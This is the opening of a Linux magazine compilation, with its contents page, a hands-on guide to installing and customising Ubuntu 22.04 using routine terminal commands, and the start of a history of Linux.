
HACKER'S MANUAL 2023
FULL OF expert TIPS & advice

ADVANCE YOUR LINUX SKILLS
• THE KERNEL • NETWORKS • SERVERS • HARDWARE • SECURITY

148 PAGES OF TUTORIALS
ENHANCE YOUR KNOWLEDGE WITH IN-DEPTH PROJECTS AND GUIDES

Digital Edition
Welcome to the 2023 edition of the Hacker's Manual! You hold in your hands
148 pages of Linux hacking tutorials, guides and features from the experts at
Linux Format magazine - the home of open source software. In this edition
we've gone in hard for security. You'll find guides to securing servers, getting
a grounding in hacking, using security tools such as Kali and Fedora Security
Lab, alongside solid features explaining how to protect your privacy online
using established tools like Tails. But we shouldn't live in fear! Hacking is
monumental fun. Never mind setting up and playing with Linux, we take a
look at hacking tablets, media servers, virtual machines, cloud servers,
multi-booting with Grub and much more. If you're a little timid when it comes
to the Terminal we even have a meaty reference section at the back.
So dive in and enjoy!
HACKER’S
MANUAL
2023
Future PLC, Quay House, The Ambury, Bath, BA1 1UA

Editorial
Designer Steve Dacombe
Compiled by Aiden Dalby & Adam Markiewicz
Senior Art Editor Andy Downes
Head of Art & Design Greg Whitaker
Editorial Director Jon White
Photography
All copyrights and trademarks are recognised and respected

Advertising
Media packs are available on request
Commercial Director Clare Dove
International
Head of Print Licensing Rachel Shaw
licensing@futurenet.com
www.futurecontenthub.com

Circulation
Head of Newstrade Tim Mathers

Production
Head of Production Mark Constance
Production Project Manager Matthew Eglinton
Advertising Production Manager Joanne Crosby
Digital Editions Controller Jason Hudson
Production Managers Keely Miller, Nola Cokely,
Vivienne Calvert, Fran Twentyman

Printed in the UK

Distributed by Marketforce, 5 Churchill Place, Canary Wharf, London, E14 5HU


www.marketforce.co.uk Tel: 0203 787 9001

Hacker’s Manual 2023 Fourteenth Edition (TCB4558)


© 2023 Future Publishing Limited

We are committed to only using magazine paper which is derived from responsibly managed, certified forestry and chlorine-free manufacture. The paper in this bookazine was sourced and produced from sustainable managed forests, conforming to strict environmental and socioeconomic standards.

All contents © 2023 Future Publishing Limited or published under licence. All rights reserved. No part of this magazine may be used, stored, transmitted or reproduced in any way without the prior written permission of the publisher. Future Publishing Limited (company number 2008885) is registered in England and Wales. Registered office: Quay House, The Ambury, Bath BA1 1UA. All information contained in this publication is for information only and is, as far as we are aware, correct at the time of going to press. Future cannot accept any responsibility for errors or inaccuracies in such information. You are advised to contact manufacturers and retailers directly with regard to the price of products/services referred to in this publication. Apps and websites mentioned in this publication are not under our control. We are not responsible for their contents or any other changes or updates to them. This magazine is fully independent and not affiliated in any way with the companies mentioned herein.

FUTURE | Connectors. Creators. Experience Makers.

Future plc is a public company quoted on the London Stock Exchange (symbol: FUTR)
www.futureplc.com Tel +44 (0)1225 442 244

Chief Executive Zillah Byng-Thorne
Non-Executive Chairman Richard Huntingford
Chief Financial and Strategy Officer Penny Ladkin-Brand

For press freedom with responsibility
Contents

HACKER’S
MANUAL
2023
Distros
The distro is the core of Linux, so make sure you get the right one.

10 Ubuntu 22.04
Get the lowdown on the latest Ubuntu release and discover its secrets.

18 30 years of Linux
How a 21-year-old's bedroom coding project took over the world.

24 Inside the Linux kernel
How did Linux come to be? What makes it tick? We answer all this and more.

32 Build the kernel
It's the ultimate nerd credential, tune up your own personal kernel, here's how...

40 Rescatux repair
Explore one of the most famous rescue and repair systems powered by Linux.

Security
The best defence is a good offence, but also a good defence.

46 Protect your privacy
Discover what threats are out there and what you can do to protect your devices.

54 Kali Linux
We take you inside the ultimate hacking toolkit and explain how to use it in anger.

58 Secure chat clients
Chat online without anyone snooping in on what you have to say.

64 Lock down Linux
We outline the essentials of locking down your Linux boxes for secure networking.

68 Data recovery
Recover files from damaged disks and ensure deleted items are gone for good.

72 Key management
Learn how to create a good GnuPG key and keep it safe from online thieves.

Software
Discover the most powerful Linux software and get using it.

78 OpenELEC
Get to grips with the media system for desktops and embedded systems.

82 VirtualBox
Ensure you get the best out of your virtual systems with our essential guide.

86 NextCloud
The breakaway, all-new cloud storage and document system is live for all.

98 Nagios
Industry-level system monitoring so you can track all your Linux PCs.

Hacking
Take your Linux skills to the next level and beyond.

96 Hacker's toolkit
Discover the tricks used by hackers to help keep your systems safe.

104 Linux on a Linx tablet
Get Linux up and running on a low-cost Windows tablet without the hassle.

108 Multi-boot Linux
Discover the inner workings of Grub and boot lots of OSes from one PC.

112 Build your own custom Ubuntu distro
Why settle for what the existing distributions have to offer?

116 LTTng monitoring
Get to know what all your programs are up to by tracing Linux app activity.

120 USB multi-boot
We explain how you can carry multiple distros on a single USB drive.

The terminal
Feel like a 1337 hacker and get to grips with the powerful terminal.

126 Get started
The best way to use the terminal is to dive in with both feet and start using it.

128 Files and folders
We explain how you can navigate the file system and start manipulating things.

130 Edit config files
Discover how you can edit configuration files from within the text terminal.

132 System information
Interrogate the local system to discover all of its dirty little secrets.

134 Drive partitions
Control, edit and create hard drive partitions and permissions.

136 Remote access
Set up and access remote GUI applications using X11.

138 Display control
Sticking with the world of X11, we use xrandr for resolution control.

140 Core commands
20 essential terminal commands that all Linux web server admins should know.


Distros
Because if there was only one form of Linux, we'd be bored

10 Ubuntu 22.04
Get the lowdown on the latest Ubuntu release and discover its secrets.

18 30 years of Linux
How a 21-year-old's bedroom coding project took over the world.

24 Inside the Linux kernel
How did Linux come to be? What makes it tick? We answer all this and more.

32 Build the kernel
It's the ultimate nerd credential, tune up your own personal kernel, here's how...

40 Rescatux repair
Explore one of the most famous rescue and repair systems powered by Linux.
Bullet-proof
Ubuntu 22.04
Walpurgis Night is nearly upon us, so cast aside your old OS and begin life
anew with Ubuntu 22.04, says Jonni Bidwell.
Nineteen years ago Canonical, led by dot-com magnate-cum-space tourist Mark Shuttleworth, unleashed the first Ubuntu release. It was nothing short of revolutionary. Suddenly Linux was a thing for human beings. Networking worked out of the box, as did a glorious - albeit brown - Gnome 2 desktop. It was built on Debian and inherited that reputation of stability, but it wasn't Debian. It was something special.
A huge community rallied around Canonical, which promised that it would listen. A bespoke bugtracker named Launchpad was set up, and the first bug filed was "Microsoft has a majority market share". For many, Linux's golden age was about to begin, and there was a palpable sense that Bug #1 would soon be fixed.
Flash forward to today, and you'll see that not all of those dreams came true. Windows still rules the desktop (though MacOS and ChromeOS are swallowing that up). Casual desktop computing as a whole is becoming a niche hobby, because a great deal of our browsing and communication is now carried out by smartphones (some of which run Linux, but not 'real' Linux). Desktop Linux is alive and well, but the ecosystem is still not perfect. An abundance of desktop choices, together with numerous forks of popular distros, have led to complaints about fragmentation (from people that don't understand open source software and free will). And Canonical copped plenty of flack when it abandoned Unity and the Ubuntu Phone.
But it's not all bad. Companies have embraced Linux, in particular Valve. Its work on Proton has enabled some 5,000 Windows-only games to be played on Linux. And Ubuntu is still a hugely popular Linux distribution that's great for playing said games, wrangling vital documents, or managing your clouds.
And now Canonical is back with a brand-new release called Jammy Jellyfish. It incorporates parts of the latest Gnome 42 desktop. The switch to the Wayland display protocol has finally happened. The new Pipewire multimedia framework is woven into its fabric. And it's a Long Term Support (LTS) release, so you can keep on using it for five whole years. You won't find earth-shattering user-facing changes here, but you will find a great, reliable OS. Read on to find out why...


Of jams and jellies
It's Ubuntu LTS time, so let's see what will be the shape of Ubuntu for the next few years...

We always look forward to trying out a new Ubuntu release. But this time around we're not expecting a wildly reinvented desktop paradigm or huge performance leaps. The previous Ubuntu LTS, Focal Fossa, after occasionally rocky beginnings, has been a loyal servant to many of our machines, and we're sure Jammy Jellyfish will be a worthy successor. We're looking forward to Gnome 42 (although there are some loose ends from earlier releases), a more polished Wayland experience and we want to see how Canonical is pushing ahead with its Snap initiative.
There's only one problem. At time of writing, it hasn't been released. But that's okay, because it will be by the time you read this. And if we're lucky we won't have missed any last-minute additions or surprises. We've been testing the daily Jammy Jellyfish images for a couple of months prior to the official release.

Minor niggles, begone!
And we've seen quite a bit of change in that time, particularly as parts of the recently released Gnome 42 start to find their way in. Indeed, as we write this we're still about a week away from launch day, but since both the Feature and UI Freeze have passed we don't expect any drastic changes. We do rather hope some minor niggles (such as stuttering and occasional crashes while dragging windows between monitors) get sorted out, though.
If you've used either of the interim releases (21.04 or 21.10) since the last LTS then you'll be aware that Ubuntu now uses Wayland and (maybe) remember that Active Directory can be set up from the installer. You'll be aware that there's light and dark versions of the Yaru theme, and you'll suspect (rightly) that these have been further tweaked. To be frank, if you've been using Ubuntu 21.10, then there's not anything ground-breaking in 22.04. But that doesn't mean you shouldn't upgrade. You should, because if nothing else your interim release is about to be EOLd. Oh, and if you're of the ilk that gets excited by phrases like 'modern design trends', then check out the new logo. It's similar to the old Circle of Friends logo, but on a web3-friendly (stop baiting sensible readers! - Ed) rectangular background.
If you just want to see what Ubuntu is like, there's no need to install it at all. Just follow our handy three-step guide to downloading, writing and booting an Ubuntu USB stick, or DVD if you must.

> The official background is over the page, but these AI-generated jellyfish by Simon Butcher are something else. CREDIT: @simonjbutcher

Download and boot Ubuntu

1 Download an ISO
Go to https://ubuntu.com/desktop and download the ISO file. It's 3.5GB so you may want to fetch a cup of tea for while you wait. If you're interested in trying another flavour, such as Kubuntu or Lubuntu, you'll find links at https://ubuntu.com/download/flavours. You'll also find links to the Server, Pi and Core editions here.

2 Write out a USB stick
Use your favourite image writer (or download Balena Etcher from https://etcher.io) to write the image to a USB stick. Don't remove the medium until you're told it's safe to do so. Bad media will cause problems later. You could also (using different software) make a DVD, but this will be slower than using flash media.

3 Boot Ubuntu
Your machine might enable you to bring up a boot menu by pressing F12 or F10 at boot time. If so use this to one-time boot from the Ubuntu medium. Otherwise you'll need to go into the UEFI/BIOS setup interface and change the boot order. See the official docs at https://ubuntu.com/tutorials/try-ubuntu-before-you-install.
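If you're already on Linux and would rather skip a graphical image writer, the ISO can be written from the terminal instead. This is only a sketch: the ISO filename should match whatever you downloaded, and /dev/sdX is a placeholder for your USB stick, so check the device name with lsblk first, because dd overwrites its target without asking.
$ lsblk
# write the image, showing progress, and flush it to the stick before unplugging
$ sudo dd if=ubuntu-22.04-desktop-amd64.iso of=/dev/sdX bs=4M status=progress conv=fsync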



Escape Windows
Whether you're a complete novice or Windows has driven you to seek out other operating systems, Ubuntu can help.

Windows 11 has been rolled out through the Insider program since October 2021. All Windows 10 users will have been offered the upgrade, in all likelihood, by the time you're reading this. There's nothing like a new Windows release for motivating people to switch to Linux. So here's a quick guide for all of you recent Windows apostates.
You may be tempted to dual-boot Windows and Ubuntu together. This might sound convenient, but it's rich with pitfalls so not something to rush into. Ubuntu will install alongside Windows, but there's no telling if down the line Windows Update will, on a whim, decide the Linux partition(s) is no longer necessary. For this reason we don't recommend installing both OSes to the same device. A 250GB SSD is ideal for your first Linux explorations, and you can get this new for around £25.
Our next prudent bit of guidance is perhaps overly cautious, and a little inconvenient, but it's the only way to be sure Windows won't touch your Linux; unplug the SSD prior to booting to Windows. Yup, it's hard to remember and potentially awkward to carry out (if your case is under the desk, say), but at least you can describe your install as 'airgapped from Windows'.
You might instead want to install Ubuntu to an external hard drive or USB stick, though if you're not using USB3 storage this won't be terribly performant. Ideally, you'd put it on a whole new machine, but not everyone has a spare, working machine.

BIOS, meet UEFI
Modern PCs use a newer firmware, the Unified Extensible Firmware Interface, rather than the traditional BIOS of yore. UEFI machines may have a classic BIOS emulation mode, but you almost certainly shouldn't

Get to know Ubuntu's Gnome desktop

1 Activities
Click on here or press Super (Windows) to bring up the Activities Overview. This will show you previews of open windows, which you can drag over to the right, to move them to a new virtual desktop.

2 Applications grid
This displays all currently installed applications. Type a few characters to narrow down the list. You can also find emoji this way, if they float your boat. Oh, and there's a virtual desktop switcher here too.

3 Status icons
Network, volume and power indicators. Click to access Bluetooth, brightness and (for laptops) power profile settings. The logout and shutdown options are also here.

4 Dock
This provides easy access to popular programs. Running applications are indicated by a red dot. Right-click to pin or unpin applications from here.

5 Desktop options
Right-click to change either the background or display settings. You can also create desktop folders.

6 Notification area
Alerts, such as new software being available or new media that's being played, are shown here. There's a calendar too - this can either be used locally or connected with a cloud service.



enable it. Especially if you already have OSes installed in UEFI mode (they will stop working).
Note that PCs these days can be incredibly fussy about getting into the UEFI setup or summoning a boot menu. Precision timing, multiple reboots, as well as digging up manuals to find the appropriate shortcut key may be required. The Ubuntu EFI boot capsules are all signed by a Microsoft-endorsed key, so there should be no need to disable Secure Boot.
One thing you should be aware of is that one EFI partition is required to boot a UEFI system. So if you plan on installing Ubuntu on a separate drive, make sure the "Device for bootloader installation" is set to the original drive, and that the EFI partition is selected. This drive will need to be plugged in to boot either OS, but you'll be able to choose which from the UEFI.
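If you're not sure which of your drives already carries an EFI System Partition, or what the firmware currently has in its boot list, a couple of read-only commands will tell you before you commit to anything. This is just a sketch: efibootmgr may need installing first (sudo apt install efibootmgr) and the device names will differ on your machine.
$ lsblk -f
# list the firmware's existing boot entries, verbosely
$ sudo efibootmgr -v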
Once you've successfully booted Ubuntu, you'll be asked whether you want to try Ubuntu or jump right in and install it. We'd suggest trying it first, if you haven't already. This enables you to get a feel for the operating system without it touching any of your storage. So you can try out bundled software, install new things and see if it's right for you. The only downside is that it won't quite be as performant as the real thing. Oh, and any changes you make will be lost after a reboot, of course. The annotation (below left) shows you the rudiments of Ubuntu's Gnome desktop.
Just as in other OSes you'll find folders for your Documents, Photos and Downloads. But unlike at least one other OS you won't be bombarded with marketing or voice assistants trying to help you. The Dock area on the left-hand side is a nod to Ubuntu's old Unity desktop. The new desktop has been based on Gnome 3 since Ubuntu 18.04, but with some usability tweaks. Gnome 3 was seen by some as too ambitious, occasionally buggy, and a memory hog when it was introduced in 2008 (this commentator even used the phrase "hypermodern"), but these days the fact it forms the basis for so many desktops is testament to its solidity. If you imagine the dock was gone you'll see what a lot of traditionalists' main problem with Gnome is: there's no obvious menu to launch applications. The applications grid provided by the Dock isn't quite the same thing, but if you're in the habit of using a mouse to open a traditionally placed applications menu, then your muscle memory will more likely bring you here than to the Activities view.
On a clean install the dock area has shortcuts to Firefox, Thunderbird and LibreOffice Writer. The question mark icon will take you to the desktop guide, which hopefully answers any questions you may have. You'll also find links to Ubuntu Software (the shopping bag icon), in case you want to install more software, as well as the venerable Rhythmbox music player. Internal and external drives will also show up here, plus there is a Rubbish Bin from whence deleted files can be retrieved.

Using a rock-solid Gnome
"The new desktop has been based on Gnome 3 since Ubuntu 18.04, but with some usability tweaks."

> Don't know what to install first? Let the Snap Store inspire you. And don't forget your updates!
> If you know what you want, partition-wise, then the Something Else option in the installer will help.

Become a Keyboard warrior


In an age of QHD screens and 4K displays, the mouse cursor's pilgrimage to the top-left corner can be an arduous one. This journey can be saved through the magic of keyboard shortcuts. Apart from the all-important Super (Windows) key to bring up the Activities view, your life in Gnome may be improved (May? - Ed) with the following knowledge:
Ctrl+Super+Left/Right » tile window left/right
Super+A » show applications grid
Super+PgUp/PgDown » switch virtual desktops
Shift+Super+PgUp/PgDown » move window to prev/next workspace
Shift+Super+Left/Right » move active window to prev/next display
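These bindings live in dconf, so they can also be inspected or remapped from a terminal with gsettings. A small sketch; the schema and key names below are the standard Gnome ones, but it's worth listing them on your own system before changing anything.
$ gsettings list-recursively org.gnome.desktop.wm.keybindings | grep -i workspace
# the value is a list of accelerators; gsettings reset undoes a change
$ gsettings set org.gnome.desktop.wm.keybindings switch-to-workspace-up "['<Super>Page_Up']"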




Customise Ubuntu
Discover new software. Change settings. Install a new desktop (or three).
Ubuntu (and most other desktop Linux flavours) have been designed to be intuitive and easy to learn. However, sooner or later you'll probably want to change some things around. For example, we think Rhythmbox is great. It's been the default music player in Ubuntu since the very beginning (with only a brief sabbatical while Banshee took its place in 2011). But with its Client Side Decorated window it looks dated, and cannot connect to popular (albeit proprietary) streaming services, so we might want to look at alternatives. By this point we're assuming you've installed Ubuntu, and enjoyed its new-look Flutter-built installer.
Fire up the Ubuntu Software application, scroll down to the list of categories and select Music and Audio. You'll see a selection of audio programs, most of which we've never heard of. You will, however, find the official Spotify and Audible programs, as well as unofficial players for Deezer, YouTube, Google Play Music and Apple Music. If you prefer something even more nostalgic, you'll also find Foobar2000, DeaDBeef-vs (a minimal GTK player and glorious hex reference) as well as myriad text-based music players. Install Spotify (or whatever else takes your fancy) by hitting the green button.
Most applications in the Software application are shipped as Snap packages. You can see the delivery mechanism in the Source box in the top-right. Snap is Canonical's self-contained packaging format which (like Flatpak, which is a similar effort) enables developers to easily ship software without having to worry about distro-specific packaging and which versions of which libraries to ship. Snaps also run in a confined sandbox (unless you give them permission to otherwise) so they can't access any files or hardware they don't need to.
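If you prefer a terminal to the green button, Snaps can be managed with the snap command as well. A quick sketch, using Spotify purely because it's the example above; snap connections needs a reasonably recent snapd.
$ sudo snap install spotify
# show the snap's description, publisher and available channels
$ snap info spotify
# see which sandbox interfaces the snap is (and isn't) allowed to use
$ snap connections spotify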
Life on the bleeding edge
Occasionally in the Source box you'll see that a variety of different 'channels' are available for a given Snap. These often enable you to grab a beta or development release, in case you want to live on the bleeding edge. System packages are still installed as .deb packages and there are still tens of thousands of these traditional packages you can install from the command line with Apt. These no longer show up in the Software application, but if you install Synaptic you can browse these graphically.
Canonical has put a lot of effort into making sure popular applications are available in Snap form. Besides Spotify, you'll find Telegram, Slack, Blender, GIMP and the PyCharm development environment for Python. There's also open source versions of some classic games, including Prince of Persia (SDLPoP), Open Jedi Knight and Widelands (a Settlers clone).

> Installing the whole Kubuntu desktop package makes for a menu that, unsurprisingly, is rich in items that begin with K.
> An ad-blocker and Mozilla's container programs are essential for the modern Web. And switching the default search to DuckDuckGo.

Desktop choices
There are multiple flavours of Ubuntu 22.04 that include the same rock-solid foundation as the flagship, but with a different desktop environment. If you like Ubuntu but don't like modern Gnome, then Kubuntu, Ubuntu MATE (inspired by Gnome 2) or the lightweight LXQt-powered Lubuntu are well worth your time. But rather than install a whole new *buntu, you might prefer to just add a new desktop to the current installation. This is unlikely to break anything, but the session packages we'll install include each desktop's core applications. So you might end up with two (or more) file managers, text editors and the like.
Some desktops come with their own login manager too. So for example if you install the kubuntu-desktop package you'll be asked if you want to stick with Gnome's GDM3 or switch to SDDM (which is built using Qt so looks more KDE-like). There's no right or wrong answer, and you can change your mind with sudo dpkg-reconfigure gdm3 . The other desktop packages are named similarly, so there's ubuntu-mate-desktop and xubuntu-desktop. Most of these have a more slimmed-down version - for example, kubuntu-core will install a more minimal set of applications.
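If you fancy trying the Kubuntu experience described in the box, the extra session can be pulled in with Apt. A sketch only: expect a hefty download, and the package will ask whether you want GDM3 or SDDM as your login manager, a choice you can revisit later.
$ sudo apt install kubuntu-desktop
# change your mind about the login manager at any time
$ sudo dpkg-reconfigure gdm3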
A big change in this Ubuntu outing is that Firefox is only available as a Snap. This comes directly from Mozilla, saving Canonical a packaging burden (and forcing derivatives such as Linux Mint to build and package their own Firefox). In our testing, there was a delay of about 10s each time Firefox was started from a clean login. This is mildly annoying since the web browser is often the first thing one opens post-login, but hopefully Snap startup times will be worked on in future.
If the slow-starting Firefox (or Snaps in general) bother you, then you can always use the Mozilla PPA to install a traditional package (see https://launchpad.net/~mozillateam/+archive/ubuntu/ppa). Or download a tarball from its FTP site. Or you could switch to the other side of the modern packaging formats debate and install Flatpak and Firefox from the Flathub. Your first act will likely be to install uBlock Origin, as well as Mozilla's Facebook Container and Multi-account Container add-ons.
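Switching to the deb-packaged Firefox from that PPA takes a pin as well as the repository, because the firefox package in the Ubuntu archive is a transitional one that would otherwise pull the Snap straight back in. The following is a sketch of the commonly documented recipe rather than gospel, so check the PPA page for the current instructions; the preferences filename is arbitrary.
$ sudo add-apt-repository ppa:mozillateam/ppa
$ sudo snap remove firefox
Then create /etc/apt/preferences.d/mozilla-firefox containing:
Package: firefox*
Pin: release o=LP-PPA-mozillateam
Pin-Priority: 1001
and finally:
$ sudo apt install firefox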
A while ago we looked at how Firefox worked on Ubuntu 21.10 (and Fedora 35), and found that the Snap version didn't work at all with VA-API video acceleration. Happily, we were able to get it working in the new version, though some extra configuration is required. Go to about:config (noting the warning) and set media.ffmpeg.vaapi.enabled to true. Later you may also want to set media.navigator.mediadatadecoder_vpx_enabled as well, which will accelerate WebRTC (for example, Zoom, Teams, Jitsi) sessions. In our testing (in Firefox 98, 99 and 100 by way of Snap channels) we had to disable the RDD sandbox to make it work. Since this is a security risk we won't tell you how to do it here (but we're sure you can DuckDuckGo it).
In that feature we also saw that both Snap and Flatpak versions of Firefox (and Chromium and Edge) can't handle extensions which use Native Messaging. This is still true, so password manager extensions (as well as things like hardware authentication tokens) don't currently work here. Both packaging formats should see a host messaging portal soon, but until then these add-ons will only work with traditionally packaged browsers. On a related tangent, KeePassXC installed as a Snap (or Flatpak) will integrate with such browsers, but you'll need to run a script, as described on its website.
Another consequence of contained browsers is that the old https://extensions.gnome.org (EGO) website won't work correctly, even if you install chrome-gnome-shell and the browser plugin. That's okay though, for now you can use a third-party tool, such as Extension Manager, to do this. This tool is available as a Flatpak, so we'll need to install that and set up the FlatHub repo first. You might want to do this even if you don't care about Gnome extensions, since it gives you a whole other avenue (and tool) by which more software can be accessed. So open a terminal and run:
$ sudo apt install flatpak gnome-software-plugin-flatpak gnome-software
$ sudo flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo
This adds support for Flatpak programs in the Gnome Software GUI, also installed by the first command. So you'll be able to search for Extension Manager there after a reboot. Note that Gnome Software is distinct from the usual Ubuntu Software tool. It's just called Software and has a shopping bag icon. Alternatively, if you're enjoying the terminal, the required incantation for installing and running (sans need to reboot) is:
$ flatpak install com.mattjakeman.ExtensionManager
$ flatpak run com.mattjakeman.ExtensionManager
You'll see that Ubuntu uses three Gnome extensions (for desktop icons, appindicators and the dock) and that two of these can be configured. And if you navigate to the Browse tab you can find many more. You might already have some favourite Gnome extensions, and hopefully most of those have been updated to support version 42. Extensions Manager will display "Unsupported" if not. The popular "Blur my Shell" is available. Likewise GSConnect, a Gnome-centric take on the popular KDE Connect utility for talking to your phone from the desktop.
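Those bundled extensions can also be poked at from the terminal using the gnome-extensions tool that ships with the shell. A brief sketch; the UUID below is the one Ubuntu's dock normally uses, but gnome-extensions list will show the exact names on your install.
$ gnome-extensions list --enabled
$ gnome-extensions info ubuntu-dock@ubuntu.com
# temporarily hide the dock; re-enable it the same way
$ gnome-extensions disable ubuntu-dock@ubuntu.com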
The shortcut bar on the left isn't to everyone's taste, although fans claim it is more efficient than having it along the bottom. You might prefer to get rid of it altogether and make the desktop more like the vanilla Gnome you'd find in the likes of Fedora. Wherever you want your dock, it can be configured by starting the Settings application (either from the menu at the top-right or from the Activities Overview) and navigating to the Appearance section.
The screenshot shows a slightly more orthodox arrangement, except there doesn't seem to be a way to move the Applications Grid shortcut to the left, which is where traditionalists might prefer to find the thing which most closely resembles a classical application menu. The new Dark Theme (which now should work universally) can also be enabled from the Appearance section.

> What's up, dock? Here we've put the Dock at the bottom, removed various clutter, and made it shorter.
> Ubuntu can make your various workspaces work how you want them to across multiple monitors.


Tweaking and rewiring
Some final edits to perfect your installation, plus a little Ubuntu nostalgia.

Wayland by default was tested in Ubuntu 17.10, but that was perhaps a little ambitious. Now the technology has matured and Canonical is confident that it's - to dredge up an irksome phrase - "ready for prime time". Extensive testing has taken place and the team are confident that the Wayland experience will be good for all. Yep, even those using Nvidia hardware. If it's not, well, that's fine. The old X11 session is still there.
Wayland has been fairly misrepresented in the press (who, me? - Ed) historically. The most egregious falsehoods were that remote desktop sessions, screen sharing and even humble screenshotting are impossible with Wayland. Do not believe such myths. The problem wasn't Wayland, it was programs that didn't support it. All the screenshots in this feature would not be here if that were the case.
One change mulled for 22.04 but which in the end never made it is the replacement of PulseAudio with PipeWire. The latter is a whole new multimedia framework which, as it happens, enables desktop sharing and screen recording on Wayland. Programs may still depend on PipeWire (particularly web browsers), but venerable PulseAudio remains the default sound server. If you want to change this (for example, if you are having difficulty with Bluetooth headsets), you can install the PipeWire session with:
$ sudo apt install pipewire-pulse
Then if you log out and back in and run the command:
$ pactl info
you should see (among other lines):
Server Name: PulseAudio (on PipeWire 0.3.xx)
Additional libraries may be required for some Bluetooth audio codecs. Try:
$ sudo apt install libfdk-aac2 libldacbt-{abr,enc}2 libopenaptx0
if you run into difficulties. Alternatively, seek more up-to-date documentation, we are unfortunately static!

We're in Gnome's golden age
"The stutters and memory leaks that dogged Ubuntu Gnome's performance for so long are well and truly gone."

Ubuntu has used Gnome as its default desktop since 18.04 LTS. If you pine for the Unity desktop, then you might be interested in the Extended Security Maintenance (ESM) that's available for the previous LTS, Ubuntu 16.04 (Xenial Xerus). The official support period for this expired in May 2021, but since this version is still widely deployed Canonical offers paid-for support to organisations. This is achieved through its Ubuntu Advantage for Infrastructure program. Personal users are allowed ESM on up to three machines for free, so if you want to keep the Xerus alive you can now do so in a safe and (semi) supported manner.
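Enrolling a machine in ESM is done with the ubuntu-advantage-tools client from the terminal. A minimal sketch, where <your-token> is a placeholder for the token shown in your Ubuntu One/Advantage account (on newer releases the same tool goes by the name pro):
$ sudo ua attach <your-token>
# confirm which services, such as esm-infra, are now enabled
$ ua status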
We were feeling nostalgic, so we fired up Ubuntu 16.04 on our XPS. This hadn't been booted for some time, and had problems seeing our new-fangled USB-C dock (or the network cable plugged therein). But once we'd updated it, enrolled the machine in Ubuntu Advantage and updated again, everything worked more or less fine. Don't let anyone tell you nostalgia is not a good reason for running old software. Especially when you're entitled to run three instances for your own pleasure. If you were looking for actual phone and ticket support, then this starts at $150/year for a single desktop installation or $750/year for a server. It's not really intended to help beginners get their printers or Wi-Fi working. Ask nicely on https://ubuntuforums.org or https://askubuntu.com for that sort of support.
Booting back into the new release was much quicker and smoother by comparison, which to be honest you'd expect after six years of UI development. This release might not have the kind of ground-breaking features that we used to enjoy, but that's probably a good thing. All those features and breaking changes we used to love five to 15 years ago were a consequence of desktop Linux still being rather new. Now that Ubuntu's desktop is established, like it or not, it doesn't make sense to go changing it. Instead, we should take comfort in the fact that after four years of using Gnome for its flagship desktop, the experience is now second to

> One thing that was quite hard to screenshot (but for once not because of Wayland) was the new screenshot tool. Oh the irony!


none. The stutters and memory leaks that dogged Ubuntu Gnome's performance for so long are well and truly gone.

A common Theme
Gnome themes have come under the spotlight since the introduction of GTK4 (inaugurated with Gnome 40). Did we say themes? Ah, we meant theme, because custom theming of Gnome applications is now verboten. The default GTK3 theme was called Adwaita, a Sanskrit word often translated as 'the only one' (literally 'not two'). But it wasn't really the only one, because developers could happily write their own CSS stylings. In GTK4 this theme has been promoted to a platform library, libadwaita, which Gnome developers say will guarantee conformance with their Human Interface Guidelines. And (like the characters often say in Highlander) there can be only one. GTK3 applications will still respect custom themes, but GTK4 ones will only support the limited changes (for example, background and accent colours) permitted by libadwaita.
For Ubuntu 22.04 this might be bad news, because at present it uses a mix of Gnome 42 applications (libadwaita-based) plus some from older releases (such as Files, which is based on GTK3 and libhandy). This may change prior to release, otherwise there are going to be some cosmetic inconsistencies. If this bothers you, then you might want to run away from Gnome 42 for the next little while, in which case there are some suggestions in the box (see below).
The old Gnome Tweaks tool is still available in the repo, but like the EGO website it can no longer manage Gnome extensions. That's okay, because it can do most everything else, including cleaning up the mess our Gnome fonts ended up in post installation of KDE Plasma. Tweaks also enables you to manage startup programs, change titlebar button visibility (or move them to the left, MacOS style) and adjust legacy theming. You can install Tweaks with:
$ sudo apt install gnome-tweaks
This will install a different Extensions tool, currently in beta form. At the time of writing this doesn't let you install new extensions, otherwise we could do away with the previous tool. For even more tweakability, try Just Perfection, found in Extension Manager. It allows for parts of the shell theme to be overruled (including removal of the top bar) to make matters more minimal. We don't go for Gnome extensions ourselves (despite having two programs for managing them), let us know what we're missing out on. Enjoy Ubuntu 22.04!

> Menus in titlebars. Amazon search results in the HUD. Ubuntu 16.04 had some crazy ideas!

Looking elsewhere?
Latterly there seems to have been a bit of a trend for Linux-leaning social media channels to announce they're "no longer recommending Ubuntu" or other such things. Reasons are varied, we suppose, but the triumvirate of Snaps, Wayland and Gnome don't seem to be to everyone's taste.
We'd still heartily recommend Ubuntu to anyone, beginner or otherwise - as it "just works". Even if you don't like it, as we've seen it can be customised, extended or otherwise bashed around to your taste. Lots of the distros these channels recommend in Ubuntu's stead are themselves based on Ubuntu - for example Linux Mint, Pop!_OS and Elementary OS. All great distros that offer something which is hard to recreate on Ubuntu Linux, but ultimately distros that depend on its packages, infrastructure and documentation.
Until now, perhaps.
Mint's latest Debian Edition (LMDE5) is rapidly gaining traction. Pop!_OS has moved its PPA repositories away from LaunchPad and is working on a new Rust-powered desktop environment (with a view to moving away from Gnome). And Elementary OS has had its own app store for a while and has likewise sided with Flatpaks over Snaps. In summary, if Ubuntu doesn't do it for you, there are plenty of derivatives you can switch to without having to learn a whole new way of working.
We're excited to see more people trying Fedora. It's now more accessible, particularly as regards installing non-free software. Together with its rapid release cycle this makes it a great platform for gaming. Well worth checking out if Ubuntu is no longer serving you.

> Fedoras and the distribution of that name are all the rage right now.



Celebrate 30 years of Linux!
How a 21-year-old's bedroom coding project took over the world and a few other things along the way.

Linux only exists because of Christmas. On January 5, 1991, a 21-year-old computer science student, who was currently living with his mum, trudged through the (we assume) snow-covered streets of Helsinki, with his pockets stuffed full of Christmas gift money. Linus Torvalds wandered up to his local PC store and purchased his first PC, an Intel 386 DX33, with 4MB of memory and a 40MB hard drive. On this stalwart machine he would write the first-ever version of Linux. From this moment on, the history of Linux becomes a love story about community collaboration, open-source development, software freedom and open platforms.
Previous to walking into that computer store, Linus Torvalds had tinkered on the obscure (UK-designed) Sinclair QL (Quantum Leap) and the far better-known Commodore VIC-20. Fine home computers, but neither was going to birth a world-straddling kernel. A boy needs standards to make something that will be adopted worldwide, and an IBM-compatible PC was a perfect place to start. But we're sure Torvalds' mind was focused more on having fun with Prince of Persia at that point than specifically developing a Microsoft-conquering kernel.
